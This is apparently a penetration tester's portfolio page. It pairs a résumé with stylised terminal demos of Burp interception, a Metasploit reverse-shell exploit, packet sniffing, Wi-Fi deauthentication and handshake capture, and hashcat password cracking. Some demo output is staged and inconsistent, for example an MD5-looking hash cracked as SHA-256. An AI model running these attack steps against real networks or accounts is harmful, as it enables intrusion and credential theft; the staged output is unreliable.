itskilltroll
- 6nodes
- 8years
Ali Omar Alaskari
Founder, Chief Creative Visionary & Developer of Solnyshko Jewellery.
Penetration Tester || Operations Coordinator , OSCP / CEH / NSE / Web3 / N8N Workflow
English: Fluent
Arabic: Fluent
Grid
Infrastructure
Simulations
Career
Burp Suite Professional | Web Infrastructure Exploitation Pipeline
1
Target Mapping & Proxy Interception
Intercept active HTTP traffic and map hidden internal application entry points.
#curl -x http://127.0.0.1:8080 -kv https://target-app.local/api/v1/auth
> POST /api/v1/auth HTTP/1.1
> Host: target-app.local
> User-Agent: Mozilla/5.0 (BurpSuite Intercept Engine)
> Host: target-app.local
> User-Agent: Mozilla/5.0 (BurpSuite Intercept Engine)
2
Request Parameter Tampering (Repeater)
Isolate transactional vectors inside the Repeater tool window to manipulate token authorization privileges manually.
#cat request.txt | nc 127.0.0.1 8080
HTTP/1.1 200 OK
X-Custom-Auth: True
Content-Type: application/json
{"status": "authenticated", "role": "admin"}
X-Custom-Auth: True
Content-Type: application/json
{"status": "authenticated", "role": "admin"}
3
Automated Payload Injection (Intruder)
Execute high-speed multi-threading payload injections into target parameter positions to force access-control failure states.
Metasploit Framework | System Remote Code Execution (RCE)
1
Vulnerability Discovery & Module Matching
Query target server version data against active CVE lists to map exploit vectors.
msf6 >search cve:2023-38606 type:exploit
Matching Modules:
================
0 exploit/linux/http/unauth_rce_payload 2023-07-24 excellent Yes
================
0 exploit/linux/http/unauth_rce_payload 2023-07-24 excellent Yes
2
Configuration & Listener Bind
Set targeting contexts and establish reverse-shell callback handlers across local routes.
msf6 exploit(unauth_rce_payload) >set RHOSTS 10.10.14.55 && set LHOST 10.10.14.4
3
Exploit Execution & Meterpreter Upgrade
Trigger memory-corruption payloads to bypass OS privilege rings, dropping into a native operational shell.
msf6 exploit(unauth_rce_payload) >exploit
[*] Sending payload stage triggers...
[+] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.14.55:49214)
meterpreter > sysinfo
Computer: Corporate-Target-Node // OS: Linux Enterprise
[+] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.14.55:49214)
meterpreter > sysinfo
Computer: Corporate-Target-Node // OS: Linux Enterprise
Wireshark | Transport Sniffing & Session Hijacking
1
Live Promiscuous Sniffing Ingestion
Force the network card to capture unencrypted data packets across the local switching domain.
#tshark -i eth0 -w dump.pcap
Capturing on 'eth0'
Packets captured: 1422
Packets captured: 1422
2
Protocol Isolation & Filtering
Isolate specific network traffic flags using precise display filters to identify incoming target authorization handshakes.
#tshark -r dump.pcap -Y "tcp.flags.syn == 1 and tcp.flags.ack == 0"
14.211425 10.10.14.2 -> 10.10.14.55 TCP 74 49214 -> 80 [SYN] Seq=0 Win=64240
3
TCP Stream Reassembly
Reconstruct raw, scattered packet frames into sequential, cleartext application buffers to extract cleartext cookies and API credentials.
Wireless Exploitation & 802.11 WPA/WPA2 Crack
1
Monitor Interface Realignment
Bypass hardware operational locks to map out surrounding wireless routers.
#airmon-ng start wlan0 && airodump-ng wlan0mon
BSSID PWR Beacons #Data, CH MB ENC CIPHER AUTH
AA:BB:CC:DD:EE:FF -42 62 412 6 54e WPA2 CCMP PSK
AA:BB:CC:DD:EE:FF -42 62 412 6 54e WPA2 CCMP PSK
2
Deauthentication & Handshake Ingestion
Inject spoofed management frames to sever connections between client nodes and the access point, recording the critical 4-way authentication handshake when they reconnect.
#aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
Sending DeAuth to target station... [WPA Handshake: AA:BB:CC:DD:EE:FF]
Hashcat | GPU-Accelerated Cryptographic Recovery
1
Hash Identification Matrix
Analyze target password hash artifacts and extract signature properties to determine algorithm references.
#hashcat --identify hash.txt
[+] SHA-256 [Hash-Mode 1400]
[+] bcrypt Blowfish [Hash-Mode 3200]
[+] bcrypt Blowfish [Hash-Mode 3200]
2
GPU Workspace Optimization & Cracking
Deploy dictionary rules and parallel core processing matrices to reverse key hashes via raw computing workloads.
#hashcat -m 1400 hash.txt wordlist.txt -r rules/best64.rule
Status...........: Cracked
Hash.Target......: e99a18c428cb38d5f260853678922e03
Hash.Password....: SecOpsAdmin2026!
Hash.Target......: e99a18c428cb38d5f260853678922e03
Hash.Password....: SecOpsAdmin2026!
BurpSuite
Auditing web application security by intercepting and analyzing live traffic.
Metasploit
Executing modular exploits and managing payloads for full-scale penetration tests.
Wireshark
Analyzing network protocols and diagnosing infrastructure traffic bottlenecks.
Wireless Security
Assessing Wi-Fi resilience using Aircrack-ng, Airegeddon, and Hashcat.
Hashcat
Testing cryptographic hash strength and password security policies.
Full-Stack Dev
Architecting secure web applications with modern frontend frameworks.
PRODUCTION_INFRASTRUCTURE_MONITOR
TARGET NODE:Select components...
OPERATIONAL STATE:—
NETWORK ADDRESS:—
ARCH TYPE:—
Topological map tracking interactive real-world pipeline assets initialized. Select any environment module or active storage layer instance to verify routing paths, protection systems, and deployment loops.
Founder & Chief Creative Visionary & Developer
solnyshkojewellery
2023 — Present
With an exceptional eye for classical luxury and modern form, AliOmar leads the artistic direction, turning avant-garde concepts into iconic, production-ready jewelry architectures.
SoloMedic Platform Development
SoloMedic
2026 — Present
- Platform Architecture: Designed the digital foundation for SoloMedic, focusing on a premium UI and healthcare-centered logic.
- Financial Integration: Implemented secure payment systems for local Iraqi banking (FIB, Super Qi) and international USDT/Crypto.
- Automation & AI: Leveraged n8n and Gemini API to streamline platform workflows and content generation.
- Asset Security: Configured Cloudflare WAF rules to protect proprietary platform data and prevent unauthorized access.
- Sponsorship Framework: Engineered a scalable tiered system to facilitate and manage diverse healthcare funding opportunities.
IT Engineer — Support & Administration
Al-Taif Islamic Bank
2023 — Present
Network Infrastructure & Hardware Deployment
- Infrastructure Design: Expert in network rack integration, including structured cabling, professional wiring, and ongoing hardware maintenance.
- Hardware Implementation: Proficient in the installation and configuration of network-attached resources, including NVRs, NAS systems, and IP-based peripherals.
- Telecommunications: Experience in the deployment and configuration of Panasonic PBX systems.
Systems Administration & Identity Management
- Directory Services: Advanced management of Azure Active Directory and on-premises Windows Domain environments, including user/computer object administration and Group Policy enforcement.
- Endpoint Management: Managed centralized update deployment via WSUS to ensure enterprise-wide security compliance.
- Multi-Factor Authentication: Implementation of FortiAuthenticator tokens to secure domain access.
Network Services & Storage Solutions
- DNS Management: Configuration and optimization of Domain Name Servers and DNS zones using Bind9 and Unbound.
- Storage & Redundancy: Comprehensive administration of QNAP NAS devices, including data redundancy (RAID), backup scheduling, and user access restrictions.
- System Monitoring: Proactive oversight of network health, monitoring servers, desktops, and storage devices to ensure maximum uptime.
Technical Support & Troubleshooting
- L2/L3 Support: Providing high-level technical assistance by identifying, investigating, and resolving complex hardware and software bottlenecks.
Offensive Security & Ethical Hacking
Self-Employeed
2018 — 2023
- Adversarial Simulation & Web Exploitation: Conducted comprehensive penetration testing across various Operating Systems (Windows/Linux) and web applications; identified and exploited high-severity vulnerabilities including Local File Inclusion (LFI), Directory Traversal, and Open Redirect flaws.
- AV Evasion & Payload Development: Developed custom obfuscation and encryption techniques to evaluate the effectiveness of Anti-Virus (AV) and Endpoint Detection and Response (EDR) solutions.
- Active Directory Exploitation: Executed advanced post-exploitation techniques, including Privilege Escalation, Lateral Movement, and Kerberoasting, to assess AD forest security.
- Exploitation Frameworks: Proficient in executing Remote Code Execution (RCE) and shell management within controlled testing environments.
Network & Wireless Security
- Traffic Analysis & Man-in-the-Middle (MITM): Performed deep-packet inspection, packet sniffing, and network spoofing (ARP/IP); utilized SSL Stripping to evaluate the integrity of encrypted communication channels.
- Wireless Security Auditing: Assessed wireless infrastructure resilience by simulating Evil Twin attacks, captive portal phishing, and Denial of Service (DoS) scenarios.
- RF & Cellular Security: Utilized SDR (Software Defined Radio) tools like HackRF for IMSI analysis and signals intelligence research.
Defensive Security & Infrastructure
- Threat Intelligence & Deception: Deployed and managed Honeypots to track adversary tactics, techniques, and procedures (TTPs) for proactive threat mitigation.
- Zero Trust Architecture: Orchestrated secure remote access and identity-verified networking using Twingate (ZTNA).
- Load Balancing & High Availability: Managed enterprise-grade traffic distribution and application delivery via Kemp Load Balancers.
Bachelor of Engineering
Al-Hadba University College
2018 — 2022
Specialization: Computer Networking Specialist. Mosul, Iraq.